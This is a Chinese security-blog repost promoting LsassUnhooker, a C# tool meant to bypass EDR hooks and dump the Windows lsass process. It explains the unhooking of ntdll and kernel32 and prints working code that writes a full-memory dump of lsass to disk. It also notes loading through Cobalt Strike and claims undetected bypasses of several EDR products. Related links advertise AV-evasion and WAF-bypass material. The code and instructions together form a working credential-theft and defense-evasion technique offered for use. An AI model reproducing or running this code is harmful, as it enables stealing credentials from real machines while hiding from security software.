LsassUnhooker
用C#编写的小程序可以绕过EDR钩子并转储lsass进程的内容,框架:.NET Framework 4,可以用CobaltStrike execute-assembly加载内存执行,集成至CS插件。
LsassUnhooker项目地址:
https://github.com/roberreigada/LsassUnhooker
SharpUnhooker项目地址:
https://github.com/GetRektBoy724/SharpUnhooker
该代码使用SharpUnhooker项目,由@GetRektBoy724创建,工作方式如下:
-
它使用“PE parser stuff”读取并复制.text section原始(磁盘中)DLL
-
它使用和从D/Invoke修补.text section加载的DLL(以更改内存的权限)Marshal.Copy、NtProtectVirtualMemory
-
它通过再次读取来检查修补的内存中 DLL,并将其与原始 DLL 进行比较,以查看其是否正确修补。
通过使用SharpUnhooker和MiniDumpWriteDump函数,我能够绕过多个EDR并设法在不被发现的情况下转储lsass的内容,这是解决问题的代码:
SilentUnhooker("ntdll.dll");SilentUnhooker("kernel32.dll");String dumpFileName = Directory.GetCurrentDirectory() + "\" + "lsass.dmp";if (System.IO.File.Exists(dumpFileName)){System.IO.File.Delete(dumpFileName);}IntPtr hFile = NativeMethods.CreateFile(dumpFileName, NativeMethods.EFileAccess.GenericWrite, NativeMethods.EFileShare.None, lpSecurityAttributes: IntPtr.Zero, dwCreationDisposition: NativeMethods.ECreationDisposition.CreateAlways, dwFlagsAndAttributes: NativeMethods.EFileAttributes.Normal, hTemplateFile: IntPtr.Zero);NativeMethods._MINIDUMP_TYPE dumpType = NativeMethods._MINIDUMP_TYPE.MiniDumpWithFullMemory;var proc = Process.GetProcessesByName("lsass").FirstOrDefault();var exceptInfo = new NativeMethods.MINIDUMP_EXCEPTION_INFORMATION();var result = NativeMethods.MiniDumpWriteDump(proc.Handle, proc.Id, hFile, dumpType, ref exceptInfo, UserStreamParam: IntPtr.Zero, CallbackParam: IntPtr.Zero);if (result == true) {Console.WriteLine("lsass process was successfully dumped in " + Directory.GetCurrentDirectory() + "\" + "lsass.dmp");}else {Console.WriteLine("Error dumping lsass process");}
绕过Cylance的示例
>精彩回顾<
Cobalt Strike免杀脚本生成器|cna脚本|bypassAV
xss bypass备忘单|xss绕过防火墙技巧|xss绕过WAF的方法
【贼详细 | 附PoC工具】Apache HTTPd最新RCE漏洞复现
关注我
获得更多精彩
坚持学习与分享!走过路过点个"在看",不会错过
仅用于学习交流,不得用于非法用途
如侵权请私聊公众号删文
原文始发于微信公众号(EchoSec):【神兵利器】一款可用于绕过EDR挂钩转储lsass进程的工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论